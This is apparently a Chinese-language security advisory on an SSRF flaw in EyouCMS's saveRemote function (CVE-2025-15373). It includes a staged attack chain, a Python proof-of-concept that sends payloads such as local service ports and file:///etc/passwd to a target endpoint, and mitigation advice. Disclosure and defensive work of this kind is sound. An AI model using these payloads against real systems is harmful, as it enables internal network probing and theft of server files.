CVE-2025-15373 CVSS 6.3 中危

CVE-2025-15373 EyouCMS saveRemote函数SSRF漏洞

披露日期: 2025-12-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-15373

漏洞类型

服务器端请求伪造（SSRF）

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

EyouCMS

漏洞概述

CVE-2025-15373是EyouCMS内容管理系统中的一个服务器端请求伪造（SSRF）安全漏洞。该漏洞存在于application/function.php文件中的saveRemote函数，攻击者可以通过操纵该函数发起对内部资源的恶意请求。由于CVSS评分为6.3（中等严重级别），攻击复杂度低且不需要高权限，远程攻击者可以轻易利用此漏洞。漏洞影响EyouCMS 1.7.7及之前版本，可导致敏感信息泄露、内网服务探测甚至进一步攻击内网基础设施。该漏洞已于2025年12月31日公开披露，供应商已发布v1.7.8修复版本，建议用户立即升级以消除安全风险。

技术细节

漏洞根源在于EyouCMS的saveRemote函数对用户输入的URL参数缺乏有效验证。攻击者可以通过构造恶意的URL请求，诱导服务器向内部网络资源（如localhost、127.0.0.1、内网IP段）发起请求。该函数在处理远程资源时未对目标地址进行安全过滤，允许攻击者绕过防火墙限制访问内部服务。攻击者常利用SSRF漏洞探测内网拓扑结构、读取本地文件（如file://协议）、访问云元数据服务或对内部应用进行指纹识别。结合其他漏洞或配置问题，SSRF还可能被利用于进一步获取服务器权限或执行远程代码。防御重点在于对所有用户可控的URL输入进行严格校验，采用白名单机制限制可访问的域名和协议。

攻击链分析

STEP 1

攻击者识别目标网站使用的EyouCMS版本（<=1.7.7）

STEP 2

定位saveRemote函数的相关接口端点（如/ajax/saveRemote）

STEP 3

构造恶意URL载荷，利用saveRemote函数发起SSRF请求

STEP 4

通过SSRF探测内网服务端口（如MySQL、Redis、SSH）

STEP 5

利用SSRF读取本地文件或访问云元数据服务获取敏感信息

STEP 6

结合其他漏洞或配置问题进一步实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-15373 SSRF PoC for EyouCMS
# Target: EyouCMS <= 1.7.7
# Vulnerability: saveRemote function in application/function.php

TARGET_URL = "http://target.com/eyoucms/"

def test_ssrf():
    """Test for SSRF vulnerability in saveRemote function"""
    # Test basic SSRF - internal port scanning
    payloads = [
        "http://127.0.0.1:80",
        "http://127.0.0.1:22",
        "http://127.0.0.1:3306",
        "http://localhost/admin",
        "file:///etc/passwd"
    ]
    
    for payload in payloads:
        data = {
            'url': payload,
            'function': 'saveRemote'
        }
        try:
            response = requests.post(
                f"{TARGET_URL}index.php?s=/ajax/saveRemote",
                data=data,
                timeout=5
            )
            print(f"Payload: {payload}")
            print(f"Status: {response.status_code}")
            print(f"Response: {response.text[:200]}")
            print("-" * 50)
        except Exception as e:
            print(f"Error testing {payload}: {e}")

if __name__ == "__main__":
    test_ssrf()
    print("PoC completed. Upgrade to EyouCMS v1.7.8 to patch this vulnerability.")

影响范围

EyouCMS <= 1.7.7

防御指南

临时缓解措施

如果无法立即升级，可临时禁用saveRemote相关功能或通过Web服务器配置限制对内部IP段的访问。同时加强服务器网络隔离，限制出站流量。对所有涉及URL参数的请求实施严格输入验证，仅允许预定义的安全域名列表。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表